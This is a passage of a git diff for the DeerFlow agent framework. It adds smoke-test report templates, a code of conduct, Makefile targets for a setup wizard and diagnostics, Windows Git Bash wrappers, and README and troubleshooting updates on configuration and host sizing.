|
||||
| Chats list `/workspace/chats` | {{chats_list_status}} | {{chats_list_details}} |
|
||||
| Agents gallery `/workspace/agents` | {{agents_gallery_status}} | {{agents_gallery_details}} |
|
||||
| Docs `{{docs_path}}` | {{docs_status}} | {{docs_details}} |
|
||||
|
||||
**Summary**: {{frontend_routes_summary}}
|
||||
|
||||
---
|
||||
|
||||
### Phase 6: Test Report Generation
|
||||
|
||||
- [x] Result summary - {{status_summary}}
|
||||
- [x] Issue log - {{status_issues}}
|
||||
- [x] Report generation - {{status_report}}
|
||||
|
||||
**Phase Status**: {{stage6_status}}
|
||||
|
||||
---
|
||||
|
||||
## Issue Log
|
||||
|
||||
### Issue 1
|
||||
**Description**: {{issue1_description}}
|
||||
**Severity**: {{issue1_severity}}
|
||||
**Solution**: {{issue1_solution}}
|
||||
|
||||
---
|
||||
|
||||
## Environment Information
|
||||
|
||||
### Docker Version
|
||||
```text
|
||||
{{docker_version_output}}
|
||||
```
|
||||
|
||||
### Git Information
|
||||
```text
|
||||
Repository: {{git_repo}}
|
||||
Branch: {{git_branch}}
|
||||
Commit: {{git_commit}}
|
||||
Commit Message: {{git_commit_message}}
|
||||
```
|
||||
|
||||
### Configuration Summary
|
||||
- config.yaml exists: {{config_exists}}
|
||||
- .env file exists: {{env_exists}}
|
||||
- Number of configured models: {{model_count}}
|
||||
|
||||
---
|
||||
|
||||
## Container Status
|
||||
|
||||
| Container Name | Status | Uptime |
|
||||
|----------|------|----------|
|
||||
| deer-flow-nginx | {{nginx_status}} | {{nginx_uptime}} |
|
||||
| deer-flow-frontend | {{frontend_status}} | {{frontend_uptime}} |
|
||||
| deer-flow-gateway | {{gateway_status}} | {{gateway_uptime}} |
|
||||
| deer-flow-langgraph | {{langgraph_status}} | {{langgraph_uptime}} |
|
||||
|
||||
---
|
||||
|
||||
## Recommendations and Next Steps
|
||||
|
||||
### If the Test Passes
|
||||
1. [ ] Visit http://localhost:2026 to start using DeerFlow
|
||||
2. [ ] Configure your preferred model if it is not configured yet
|
||||
3. [ ] Explore available skills
|
||||
4. [ ] Refer to the documentation to learn more features
|
||||
|
||||
### If the Test Fails
|
||||
1. [ ] Review references/troubleshooting.md for common solutions
|
||||
2. [ ] Check Docker logs: `make docker-logs`
|
||||
3. [ ] Verify configuration file format and content
|
||||
4. [ ] If needed, fully reset the environment: `make clean && make config && make docker-init && make docker-start`
|
||||
|
||||
---
|
||||
|
||||
## Appendix
|
||||
|
||||
### Full Logs
|
||||
{{full_logs}}
|
||||
|
||||
### Tester
|
||||
{{tester_name}}
|
||||
|
||||
---
|
||||
|
||||
*Report generated at: {{report_time}}*
|
||||
@@ -0,0 +1,185 @@
|
||||
# DeerFlow Smoke Test Report
|
||||
|
||||
**Test Date**: {{test_date}}
|
||||
**Test Environment**: {{test_environment}}
|
||||
**Deployment Mode**: Local
|
||||
**Test Version**: {{git_commit}}
|
||||
|
||||
---
|
||||
|
||||
## Execution Summary
|
||||
|
||||
| Metric | Value |
|
||||
|------|------|
|
||||
| Total Test Phases | 6 |
|
||||
| Passed Phases | {{passed_stages}} |
|
||||
| Failed Phases | {{failed_stages}} |
|
||||
| Overall Conclusion | **{{overall_status}}** |
|
||||
|
||||
### Key Test Cases
|
||||
|
||||
| Case | Result | Details |
|
||||
|------|--------|---------|
|
||||
| Code update check | {{case_code_update}} | {{case_code_update_details}} |
|
||||
| Environment check | {{case_env_check}} | {{case_env_check_details}} |
|
||||
| Configuration preparation | {{case_config_prep}} | {{case_config_prep_details}} |
|
||||
| Deployment | {{case_deploy}} | {{case_deploy_details}} |
|
||||
| Health check | {{case_health_check}} | {{case_health_check_details}} |
|
||||
| Frontend routes | {{case_frontend_routes_overall}} | {{case_frontend_routes_details}} |
|
||||
|
||||
---
|
||||
|
||||
## Detailed Test Results
|
||||
|
||||
### Phase 1: Code Update Check
|
||||
|
||||
- [x] Confirm current directory - {{status_dir_check}}
|
||||
- [x] Check Git status - {{status_git_status}}
|
||||
- [x] Pull latest code - {{status_git_pull}}
|
||||
- [x] Confirm code update - {{status_git_verify}}
|
||||
|
||||
**Phase Status**: {{stage1_status}}
|
||||
|
||||
---
|
||||
|
||||
### Phase 2: Local Environment Check
|
||||
|
||||
- [x] Node.js version - {{status_node_version}}
|
||||
- [x] pnpm - {{status_pnpm}}
|
||||
- [x] uv - {{status_uv}}
|
||||
- [x] nginx - {{status_nginx}}
|
||||
- [x] Port check - {{status_port_check}}
|
||||
|
||||
**Phase Status**: {{stage2_status}}
|
||||
|
||||
---
|
||||
|
||||
### Phase 3: Configuration Preparation
|
||||
|
||||
- [x] config.yaml - {{status_config_yaml}}
|
||||
- [x] .env file - {{status_env_file}}
|
||||
- [x] Model configuration - {{status_model_config}}
|
||||
|
||||
**Phase Status**: {{stage3_status}}
|
||||
|
||||
---
|
||||
|
||||
### Phase 4: Local Deployment
|
||||
|
||||
- [x] make check - {{status_make_check}}
|
||||
- [x] make install - {{status_make_install}}
|
||||
- [x] make dev-daemon / make dev - {{status_local_start}}
|
||||
- [x] Service startup wait - {{status_wait_startup}}
|
||||
|
||||
**Phase Status**: {{stage4_status}}
|
||||
|
||||
---
|
||||
|
||||
### Phase 5: Service Health Check
|
||||
|
||||
- [x] Process status - {{status_processes}}
|
||||
- [x] Frontend service - {{status_frontend}}
|
||||
- [x] API Gateway - {{status_api_gateway}}
|
||||
- [x] LangGraph service - {{status_langgraph}}
|
||||
|
||||
**Phase Status**: {{stage5_status}}
|
||||
|
||||
---
|
||||
|
||||
### Frontend Routes Smoke Results
|
||||
|
||||
| Route | Status | Details |
|
||||
|-------|--------|---------|
|
||||
| Landing `/` | {{landing_status}} | {{landing_details}} |
|
||||
| Workspace redirect `/workspace` | {{workspace_redirect_status}} | target {{workspace_redirect_target}} |
|
||||
| New chat `/workspace/chats/new` | {{new_chat_status}} | {{new_chat_details}} |
|
||||
| Chats list `/workspace/chats` | {{chats_list_status}} | {{chats_list_details}} |
|
||||
| Agents gallery `/workspace/agents` | {{agents_gallery_status}} | {{agents_gallery_details}} |
|
||||
| Docs `{{docs_path}}` | {{docs_status}} | {{docs_details}} |
|
||||
|
||||
**Summary**: {{frontend_routes_summary}}
|
||||
|
||||
---
|
||||
|
||||
### Phase 6: Test Report Generation
|
||||
|
||||
- [x] Result summary - {{status_summary}}
|
||||
- [x] Issue log - {{status_issues}}
|
||||
- [x] Report generation - {{status_report}}
|
||||
|
||||
**Phase Status**: {{stage6_status}}
|
||||
|
||||
---
|
||||
|
||||
## Issue Log
|
||||
|
||||
### Issue 1
|
||||
**Description**: {{issue1_description}}
|
||||
**Severity**: {{issue1_severity}}
|
||||
**Solution**: {{issue1_solution}}
|
||||
|
||||
---
|
||||
|
||||
## Environment Information
|
||||
|
||||
### Local Dependency Versions
|
||||
```text
|
||||
Node.js: {{node_version_output}}
|
||||
pnpm: {{pnpm_version_output}}
|
||||
uv: {{uv_version_output}}
|
||||
nginx: {{nginx_version_output}}
|
||||
```
|
||||
|
||||
### Git Information
|
||||
```text
|
||||
Repository: {{git_repo}}
|
||||
Branch: {{git_branch}}
|
||||
Commit: {{git_commit}}
|
||||
Commit Message: {{git_commit_message}}
|
||||
```
|
||||
|
||||
### Configuration Summary
|
||||
- config.yaml exists: {{config_exists}}
|
||||
- .env file exists: {{env_exists}}
|
||||
- Number of configured models: {{model_count}}
|
||||
|
||||
---
|
||||
|
||||
## Local Service Status
|
||||
|
||||
| Service | Status | Endpoint |
|
||||
|---------|--------|----------|
|
||||
| Nginx | {{nginx_status}} | {{nginx_endpoint}} |
|
||||
| Frontend | {{frontend_status}} | {{frontend_endpoint}} |
|
||||
| Gateway | {{gateway_status}} | {{gateway_endpoint}} |
|
||||
| LangGraph | {{langgraph_status}} | {{langgraph_endpoint}} |
|
||||
|
||||
---
|
||||
|
||||
## Recommendations and Next Steps
|
||||
|
||||
### If the Test Passes
|
||||
1. [ ] Visit http://localhost:2026 to start using DeerFlow
|
||||
2. [ ] Configure your preferred model if it is not configured yet
|
||||
3. [ ] Explore available skills
|
||||
4. [ ] Refer to the documentation to learn more features
|
||||
|
||||
### If the Test Fails
|
||||
1. [ ] Review references/troubleshooting.md for common solutions
|
||||
2. [ ] Check local logs: `logs/{langgraph,gateway,frontend,nginx}.log`
|
||||
3. [ ] Verify configuration file format and content
|
||||
4. [ ] If needed, fully reset the environment: `make stop && make clean && make install && make dev-daemon`
|
||||
|
||||
---
|
||||
|
||||
## Appendix
|
||||
|
||||
### Full Logs
|
||||
{{full_logs}}
|
||||
|
||||
### Tester
|
||||
{{tester_name}}
|
||||
|
||||
---
|
||||
|
||||
*Report generated at: {{report_time}}*
|
||||
@@ -33,5 +33,9 @@ INFOQUEST_API_KEY=your-infoquest-api-key
# GitHub API Token
# GITHUB_TOKEN=your-github-token

# Database (only needed when config.yaml has database.backend: postgres)
# DATABASE_URL=postgresql://deerflow:password@localhost:5432/deerflow
#
# WECOM_BOT_ID=your-wecom-bot-id
# WECOM_BOT_SECRET=your-wecom-bot-secret
@@ -0,0 +1,128 @@
|
||||
# Contributor Covenant Code of Conduct
|
||||
|
||||
## Our Pledge
|
||||
|
||||
We as members, contributors, and leaders pledge to make participation in our
|
||||
community a harassment-free experience for everyone, regardless of age, body
|
||||
size, visible or invisible disability, ethnicity, sex characteristics, gender
|
||||
identity and expression, level of experience, education, socio-economic status,
|
||||
nationality, personal appearance, race, religion, or sexual identity
|
||||
and orientation.
|
||||
|
||||
We pledge to act and interact in ways that contribute to an open, welcoming,
|
||||
diverse, inclusive, and healthy community.
|
||||
|
||||
## Our Standards
|
||||
|
||||
Examples of behavior that contributes to a positive environment for our
|
||||
community include:
|
||||
|
||||
* Demonstrating empathy and kindness toward other people
|
||||
* Being respectful of differing opinions, viewpoints, and experiences
|
||||
* Giving and gracefully accepting constructive feedback
|
||||
* Accepting responsibility and apologizing to those affected by our mistakes,
|
||||
and learning from the experience
|
||||
* Focusing on what is best not just for us as individuals, but for the
|
||||
overall community
|
||||
|
||||
Examples of unacceptable behavior include:
|
||||
|
||||
* The use of sexualized language or imagery, and sexual attention or
|
||||
advances of any kind
|
||||
* Trolling, insulting or derogatory comments, and personal or political attacks
|
||||
* Public or private harassment
|
||||
* Publishing others' private information, such as a physical or email
|
||||
address, without their explicit permission
|
||||
* Other conduct which could reasonably be considered inappropriate in a
|
||||
professional setting
|
||||
|
||||
## Enforcement Responsibilities
|
||||
|
||||
Community leaders are responsible for clarifying and enforcing our standards of
|
||||
acceptable behavior and will take appropriate and fair corrective action in
|
||||
response to any behavior that they deem inappropriate, threatening, offensive,
|
||||
or harmful.
|
||||
|
||||
Community leaders have the right and responsibility to remove, edit, or reject
|
||||
comments, commits, code, wiki edits, issues, and other contributions that are
|
||||
not aligned to this Code of Conduct, and will communicate reasons for moderation
|
||||
decisions when appropriate.
|
||||
|
||||
## Scope
|
||||
|
||||
This Code of Conduct applies within all community spaces, and also applies when
|
||||
an individual is officially representing the community in public spaces.
|
||||
Examples of representing our community include using an official e-mail address,
|
||||
posting via an official social media account, or acting as an appointed
|
||||
representative at an online or offline event.
|
||||
|
||||
## Enforcement
|
||||
|
||||
Instances of abusive, harassing, or otherwise unacceptable behavior may be
|
||||
reported to the community leaders responsible for enforcement at
|
||||
willem.jiang@gmail.com.
|
||||
All complaints will be reviewed and investigated promptly and fairly.
|
||||
|
||||
All community leaders are obligated to respect the privacy and security of the
|
||||
reporter of any incident.
|
||||
|
||||
## Enforcement Guidelines
|
||||
|
||||
Community leaders will follow these Community Impact Guidelines in determining
|
||||
the consequences for any action they deem in violation of this Code of Conduct:
|
||||
|
||||
### 1. Correction
|
||||
|
||||
**Community Impact**: Use of inappropriate language or other behavior deemed
|
||||
unprofessional or unwelcome in the community.
|
||||
|
||||
**Consequence**: A private, written warning from community leaders, providing
|
||||
clarity around the nature of the violation and an explanation of why the
|
||||
behavior was inappropriate. A public apology may be requested.
|
||||
|
||||
### 2. Warning
|
||||
|
||||
**Community Impact**: A violation through a single incident or series
|
||||
of actions.
|
||||
|
||||
**Consequence**: A warning with consequences for continued behavior. No
|
||||
interaction with the people involved, including unsolicited interaction with
|
||||
those enforcing the Code of Conduct, for a specified period of time. This
|
||||
includes avoiding interactions in community spaces as well as external channels
|
||||
like social media. Violating these terms may lead to a temporary or
|
||||
permanent ban.
|
||||
|
||||
### 3. Temporary Ban
|
||||
|
||||
**Community Impact**: A serious violation of community standards, including
|
||||
sustained inappropriate behavior.
|
||||
|
||||
**Consequence**: A temporary ban from any sort of interaction or public
|
||||
communication with the community for a specified period of time. No public or
|
||||
private interaction with the people involved, including unsolicited interaction
|
||||
with those enforcing the Code of Conduct, is allowed during this period.
|
||||
Violating these terms may lead to a permanent ban.
|
||||
|
||||
### 4. Permanent Ban
|
||||
|
||||
**Community Impact**: Demonstrating a pattern of violation of community
|
||||
standards, including sustained inappropriate behavior, harassment of an
|
||||
individual, or aggression toward or disparagement of classes of individuals.
|
||||
|
||||
**Consequence**: A permanent ban from any sort of public interaction within
|
||||
the community.
|
||||
|
||||
## Attribution
|
||||
|
||||
This Code of Conduct is adapted from the [Contributor Covenant][homepage],
|
||||
version 2.0, available at
|
||||
https://www.contributor-covenant.org/version/2/0/code_of_conduct.html.
|
||||
|
||||
Community Impact Guidelines were inspired by [Mozilla's code of conduct
|
||||
enforcement ladder](https://github.com/mozilla/diversity).
|
||||
|
||||
[homepage]: https://www.contributor-covenant.org
|
||||
|
||||
For answers to common questions about this code of conduct, see the FAQ at
|
||||
https://www.contributor-covenant.org/faq. Translations are available at
|
||||
https://www.contributor-covenant.org/translations.
|
||||
@@ -77,6 +77,18 @@ export UV_INDEX_URL=https://pypi.org/simple
|
||||
export NPM_REGISTRY=https://registry.npmjs.org
|
||||
```
|
||||
|
||||
#### Recommended host resources
|
||||
|
||||
Use these as practical starting points for development and review environments:
|
||||
|
||||
| Scenario | Starting point | Recommended | Notes |
|
||||
|---------|-----------|------------|-------|
|
||||
| `make dev` on one machine | 4 vCPU, 8 GB RAM | 8 vCPU, 16 GB RAM | Best when DeerFlow uses hosted model APIs. |
|
||||
| `make docker-start` review environment | 4 vCPU, 8 GB RAM | 8 vCPU, 16 GB RAM | Docker image builds and sandbox containers need extra headroom. |
|
||||
| Shared Linux test server | 8 vCPU, 16 GB RAM | 16 vCPU, 32 GB RAM | Prefer this for heavier multi-agent runs or multiple reviewers. |
|
||||
|
||||
`2 vCPU / 4 GB` environments often fail to start reliably or become unresponsive under normal DeerFlow workloads.
|
||||
|
||||
#### Linux: Docker daemon permission denied
|
||||
|
||||
If `make docker-init`, `make docker-start`, or `make docker-stop` fails on Linux with an error like below, your current user likely does not have permission to access the Docker daemon socket:
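
As a hedged illustration (the exact wording varies by Docker version and distribution), the failure typically looks like the snippet below, and adding your user to the `docker` group is the usual remedy:

```bash
# Typical symptom (illustrative; exact text varies by Docker version):
#   permission denied while trying to connect to the Docker daemon socket at
#   unix:///var/run/docker.sock

# Common fix: add the current user to the docker group, then start a new login session.
sudo usermod -aG docker "$USER"
newgrp docker   # or log out and back in
docker info     # should now work without sudo
```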
|
||||
|
||||
@@ -1,19 +1,25 @@
|
||||
# DeerFlow - Unified Development Environment
|
||||
|
||||
.PHONY: help config config-upgrade check install dev dev-pro dev-daemon dev-daemon-pro start start-pro start-daemon start-daemon-pro stop up up-pro down clean docker-init docker-start docker-start-pro docker-stop docker-logs docker-logs-frontend docker-logs-gateway
|
||||
.PHONY: help config config-upgrade check install setup doctor dev dev-pro dev-daemon dev-daemon-pro start start-pro start-daemon start-daemon-pro stop up up-pro down clean docker-init docker-start docker-start-pro docker-stop docker-logs docker-logs-frontend docker-logs-gateway
|
||||
|
||||
BASH ?= bash
|
||||
BACKEND_UV_RUN = cd backend && uv run
|
||||
|
||||
# Detect OS for Windows compatibility
|
||||
ifeq ($(OS),Windows_NT)
|
||||
SHELL := cmd.exe
|
||||
PYTHON ?= python
|
||||
# Run repo shell scripts through Git Bash when Make is launched from cmd.exe / PowerShell.
|
||||
RUN_WITH_GIT_BASH = call scripts\run-with-git-bash.cmd
|
||||
else
|
||||
PYTHON ?= python3
|
||||
RUN_WITH_GIT_BASH =
|
||||
endif
|
||||
|
||||
help:
|
||||
@echo "DeerFlow Development Commands:"
|
||||
@echo " make setup - Interactive setup wizard (recommended for new users)"
|
||||
@echo " make doctor - Check configuration and system requirements"
|
||||
@echo " make config - Generate local config files (aborts if config already exists)"
|
||||
@echo " make config-upgrade - Merge new fields from config.example.yaml into config.yaml"
|
||||
@echo " make check - Check if all required tools are installed"
|
||||
@@ -44,11 +50,18 @@ help:
|
||||
@echo " make docker-logs-frontend - View Docker frontend logs"
|
||||
@echo " make docker-logs-gateway - View Docker gateway logs"
|
||||
|
||||
## Setup & Diagnosis
|
||||
setup:
|
||||
@$(BACKEND_UV_RUN) python ../scripts/setup_wizard.py
|
||||
|
||||
doctor:
|
||||
@$(BACKEND_UV_RUN) python ../scripts/doctor.py
|
||||
|
||||
config:
|
||||
@$(PYTHON) ./scripts/configure.py
|
||||
|
||||
config-upgrade:
|
||||
@./scripts/config-upgrade.sh
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/config-upgrade.sh
|
||||
|
||||
# Check required tools
|
||||
check:
|
||||
@@ -106,78 +119,46 @@ setup-sandbox:
|
||||
# Start all services in development mode (with hot-reloading)
|
||||
dev:
|
||||
@$(PYTHON) ./scripts/check.py
|
||||
ifeq ($(OS),Windows_NT)
|
||||
@call scripts\run-with-git-bash.cmd ./scripts/serve.sh --dev
|
||||
else
|
||||
@./scripts/serve.sh --dev
|
||||
endif
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/serve.sh --dev
|
||||
|
||||
# Start all services in dev + Gateway mode (experimental: agent runtime embedded in Gateway)
|
||||
dev-pro:
|
||||
@$(PYTHON) ./scripts/check.py
|
||||
ifeq ($(OS),Windows_NT)
|
||||
@call scripts\run-with-git-bash.cmd ./scripts/serve.sh --dev --gateway
|
||||
else
|
||||
@./scripts/serve.sh --dev --gateway
|
||||
endif
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/serve.sh --dev --gateway
|
||||
|
||||
# Start all services in production mode (with optimizations)
|
||||
start:
|
||||
@$(PYTHON) ./scripts/check.py
|
||||
ifeq ($(OS),Windows_NT)
|
||||
@call scripts\run-with-git-bash.cmd ./scripts/serve.sh --prod
|
||||
else
|
||||
@./scripts/serve.sh --prod
|
||||
endif
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/serve.sh --prod
|
||||
|
||||
# Start all services in prod + Gateway mode (experimental)
|
||||
start-pro:
|
||||
@$(PYTHON) ./scripts/check.py
|
||||
ifeq ($(OS),Windows_NT)
|
||||
@call scripts\run-with-git-bash.cmd ./scripts/serve.sh --prod --gateway
|
||||
else
|
||||
@./scripts/serve.sh --prod --gateway
|
||||
endif
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/serve.sh --prod --gateway
|
||||
|
||||
# Start all services in daemon mode (background)
|
||||
dev-daemon:
|
||||
@$(PYTHON) ./scripts/check.py
|
||||
ifeq ($(OS),Windows_NT)
|
||||
@call scripts\run-with-git-bash.cmd ./scripts/serve.sh --dev --daemon
|
||||
else
|
||||
@./scripts/serve.sh --dev --daemon
|
||||
endif
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/serve.sh --dev --daemon
|
||||
|
||||
# Start daemon + Gateway mode (experimental)
|
||||
dev-daemon-pro:
|
||||
@$(PYTHON) ./scripts/check.py
|
||||
ifeq ($(OS),Windows_NT)
|
||||
@call scripts\run-with-git-bash.cmd ./scripts/serve.sh --dev --gateway --daemon
|
||||
else
|
||||
@./scripts/serve.sh --dev --gateway --daemon
|
||||
endif
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/serve.sh --dev --gateway --daemon
|
||||
|
||||
# Start prod services in daemon mode (background)
|
||||
start-daemon:
|
||||
@$(PYTHON) ./scripts/check.py
|
||||
ifeq ($(OS),Windows_NT)
|
||||
@call scripts\run-with-git-bash.cmd ./scripts/serve.sh --prod --daemon
|
||||
else
|
||||
@./scripts/serve.sh --prod --daemon
|
||||
endif
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/serve.sh --prod --daemon
|
||||
|
||||
# Start prod daemon + Gateway mode (experimental)
|
||||
start-daemon-pro:
|
||||
@$(PYTHON) ./scripts/check.py
|
||||
ifeq ($(OS),Windows_NT)
|
||||
@call scripts\run-with-git-bash.cmd ./scripts/serve.sh --prod --gateway --daemon
|
||||
else
|
||||
@./scripts/serve.sh --prod --gateway --daemon
|
||||
endif
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/serve.sh --prod --gateway --daemon
|
||||
|
||||
# Stop all services
|
||||
stop:
|
||||
@./scripts/serve.sh --stop
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/serve.sh --stop
|
||||
|
||||
# Clean up
|
||||
clean: stop
|
||||
@@ -193,29 +174,29 @@ clean: stop
|
||||
|
||||
# Initialize Docker containers and install dependencies
|
||||
docker-init:
|
||||
@./scripts/docker.sh init
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/docker.sh init
|
||||
|
||||
# Start Docker development environment
|
||||
docker-start:
|
||||
@./scripts/docker.sh start
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/docker.sh start
|
||||
|
||||
# Start Docker in Gateway mode (experimental)
|
||||
docker-start-pro:
|
||||
@./scripts/docker.sh start --gateway
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/docker.sh start --gateway
|
||||
|
||||
# Stop Docker development environment
|
||||
docker-stop:
|
||||
@./scripts/docker.sh stop
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/docker.sh stop
|
||||
|
||||
# View Docker development logs
|
||||
docker-logs:
|
||||
@./scripts/docker.sh logs
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/docker.sh logs
|
||||
|
||||
# View Docker development logs
|
||||
docker-logs-frontend:
|
||||
@./scripts/docker.sh logs --frontend
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/docker.sh logs --frontend
|
||||
docker-logs-gateway:
|
||||
@./scripts/docker.sh logs --gateway
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/docker.sh logs --gateway
|
||||
|
||||
# ==========================================
|
||||
# Production Docker Commands
|
||||
@@ -223,12 +204,12 @@ docker-logs-gateway:
|
||||
|
||||
# Build and start production services
|
||||
up:
|
||||
@./scripts/deploy.sh
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/deploy.sh
|
||||
|
||||
# Build and start production services in Gateway mode
|
||||
up-pro:
|
||||
@./scripts/deploy.sh --gateway
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/deploy.sh --gateway
|
||||
|
||||
# Stop and remove production containers
|
||||
down:
|
||||
@./scripts/deploy.sh down
|
||||
@$(RUN_WITH_GIT_BASH) ./scripts/deploy.sh down
|
||||
|
||||
@@ -53,6 +53,7 @@ DeerFlow has newly integrated the intelligent search and crawling toolset indepe
|
||||
- [Quick Start](#quick-start)
|
||||
- [Configuration](#configuration)
|
||||
- [Running the Application](#running-the-application)
|
||||
- [Deployment Sizing](#deployment-sizing)
|
||||
- [Option 1: Docker (Recommended)](#option-1-docker-recommended)
|
||||
- [Option 2: Local Development](#option-2-local-development)
|
||||
- [Advanced](#advanced)
|
||||
@@ -103,35 +104,38 @@ That prompt is intended for coding agents. It tells the agent to clone the repo
|
||||
cd deer-flow
|
||||
```
|
||||
|
||||
2. **Generate local configuration files**
|
||||
2. **Run the setup wizard**
|
||||
|
||||
From the project root directory (`deer-flow/`), run:
|
||||
|
||||
```bash
|
||||
make config
|
||||
make setup
|
||||
```
|
||||
|
||||
This command creates local configuration files based on the provided example templates.
|
||||
This launches an interactive wizard that guides you through choosing an LLM provider, optional web search, and execution/safety preferences such as sandbox mode, bash access, and file-write tools. It generates a minimal `config.yaml` and writes your keys to `.env`. The whole flow takes about two minutes.
|
||||
|
||||
3. **Configure your preferred model(s)**
|
||||
The wizard also lets you configure an optional web search provider, or skip it for now.
|
||||
|
||||
Edit `config.yaml` and define at least one model:
|
||||
Run `make doctor` at any time to verify your setup and get actionable fix hints.
|
||||
|
||||
> **Advanced / manual configuration**: If you prefer to edit `config.yaml` directly, run `make config` instead to copy the full template. See `config.example.yaml` for the complete reference including CLI-backed providers (Codex CLI, Claude Code OAuth), OpenRouter, Responses API, and more.
|
||||
|
||||
<details>
|
||||
<summary>Manual model configuration examples</summary>
|
||||
|
||||
```yaml
|
||||
models:
|
||||
- name: gpt-4 # Internal identifier
|
||||
display_name: GPT-4 # Human-readable name
|
||||
use: langchain_openai:ChatOpenAI # LangChain class path
|
||||
model: gpt-4 # Model identifier for API
|
||||
api_key: $OPENAI_API_KEY # API key (recommended: use env var)
|
||||
max_tokens: 4096 # Maximum tokens per request
|
||||
temperature: 0.7 # Sampling temperature
|
||||
- name: gpt-4o
|
||||
display_name: GPT-4o
|
||||
use: langchain_openai:ChatOpenAI
|
||||
model: gpt-4o
|
||||
api_key: $OPENAI_API_KEY
|
||||
|
||||
- name: openrouter-gemini-2.5-flash
|
||||
display_name: Gemini 2.5 Flash (OpenRouter)
|
||||
use: langchain_openai:ChatOpenAI
|
||||
model: google/gemini-2.5-flash-preview
|
||||
api_key: $OPENAI_API_KEY # OpenRouter still uses the OpenAI-compatible field name here
|
||||
api_key: $OPENROUTER_API_KEY
|
||||
base_url: https://openrouter.ai/api/v1
|
||||
|
||||
- name: gpt-5-responses
|
||||
@@ -181,50 +185,39 @@ That prompt is intended for coding agents. It tells the agent to clone the repo
|
||||
```
|
||||
|
||||
- Codex CLI reads `~/.codex/auth.json`
|
||||
- The Codex Responses endpoint currently rejects `max_tokens` and `max_output_tokens`, so `CodexChatModel` does not expose a request-level token cap
|
||||
- Claude Code accepts `CLAUDE_CODE_OAUTH_TOKEN`, `ANTHROPIC_AUTH_TOKEN`, `CLAUDE_CODE_OAUTH_TOKEN_FILE_DESCRIPTOR`, `CLAUDE_CODE_CREDENTIALS_PATH`, or plaintext `~/.claude/.credentials.json`
|
||||
- ACP agent entries are separate from model providers. If you configure `acp_agents.codex`, point it at a Codex ACP adapter such as `npx -y @zed-industries/codex-acp`; the standard `codex` CLI binary is not ACP-compatible by itself
|
||||
- On macOS, DeerFlow does not probe Keychain automatically. Export Claude Code auth explicitly if needed:
|
||||
- Claude Code accepts `CLAUDE_CODE_OAUTH_TOKEN`, `ANTHROPIC_AUTH_TOKEN`, `CLAUDE_CODE_CREDENTIALS_PATH`, or `~/.claude/.credentials.json`
|
||||
- ACP agent entries are separate from model providers — if you configure `acp_agents.codex`, point it at a Codex ACP adapter such as `npx -y @zed-industries/codex-acp`
|
||||
- On macOS, export Claude Code auth explicitly if needed:
|
||||
|
||||
```bash
|
||||
eval "$(python3 scripts/export_claude_code_oauth.py --print-export)"
|
||||
```
|
||||
|
||||
4. **Set API keys for your configured model(s)**
|
||||
|
||||
Choose one of the following methods:
|
||||
|
||||
- Option A: Edit the `.env` file in the project root (Recommended)
|
||||
|
||||
API keys can also be set manually in `.env` (recommended) or exported in your shell:
|
||||
|
||||
```bash
|
||||
TAVILY_API_KEY=your-tavily-api-key
|
||||
OPENAI_API_KEY=your-openai-api-key
|
||||
# OpenRouter also uses OPENAI_API_KEY when your config uses langchain_openai:ChatOpenAI + base_url.
|
||||
# Add other provider keys as needed
|
||||
INFOQUEST_API_KEY=your-infoquest-api-key
|
||||
TAVILY_API_KEY=your-tavily-api-key
|
||||
```
|
||||
|
||||
- Option B: Export environment variables in your shell
|
||||
|
||||
```bash
|
||||
export OPENAI_API_KEY=your-openai-api-key
|
||||
```
|
||||
|
||||
For CLI-backed providers:
|
||||
- Codex CLI: `~/.codex/auth.json`
|
||||
- Claude Code OAuth: explicit env/file handoff or `~/.claude/.credentials.json`
|
||||
|
||||
- Option C: Edit `config.yaml` directly (Not recommended for production)
|
||||
|
||||
```yaml
|
||||
models:
|
||||
- name: gpt-4
|
||||
api_key: your-actual-api-key-here # Replace placeholder
|
||||
```
|
||||
</details>
|
||||
|
||||
### Running the Application
|
||||
|
||||
#### Deployment Sizing
|
||||
|
||||
Use the table below as a practical starting point when choosing how to run DeerFlow:
|
||||
|
||||
| Deployment target | Starting point | Recommended | Notes |
|
||||
|---------|-----------|------------|-------|
|
||||
| Local evaluation / `make dev` | 4 vCPU, 8 GB RAM, 20 GB free SSD | 8 vCPU, 16 GB RAM | Good for one developer or one light session with hosted model APIs. `2 vCPU / 4 GB` is usually not enough. |
|
||||
| Docker development / `make docker-start` | 4 vCPU, 8 GB RAM, 25 GB free SSD | 8 vCPU, 16 GB RAM | Image builds, bind mounts, and sandbox containers need more headroom than pure local dev. |
|
||||
| Long-running server / `make up` | 8 vCPU, 16 GB RAM, 40 GB free SSD | 16 vCPU, 32 GB RAM | Preferred for shared use, multi-agent runs, report generation, or heavier sandbox workloads. |
|
||||
|
||||
- These numbers cover DeerFlow itself. If you also host a local LLM, size that service separately.
|
||||
- Linux plus Docker is the recommended deployment target for a persistent server. macOS and Windows are best treated as development or evaluation environments.
|
||||
- If CPU or memory usage stays pinned, reduce concurrent runs first, then move to the next sizing tier.
|
||||
|
||||
#### Option 1: Docker (Recommended)
|
||||
|
||||
**Development** (hot-reload, source mounts):
|
||||
@@ -261,7 +254,7 @@ See [CONTRIBUTING.md](CONTRIBUTING.md) for detailed Docker development guide.
|
||||
|
||||
If you prefer running services locally:
|
||||
|
||||
Prerequisite: complete the "Configuration" steps above first (`make config` and model API keys). `make dev` requires a valid configuration file (defaults to `config.yaml` in the project root; can be overridden via `DEER_FLOW_CONFIG_PATH`).
|
||||
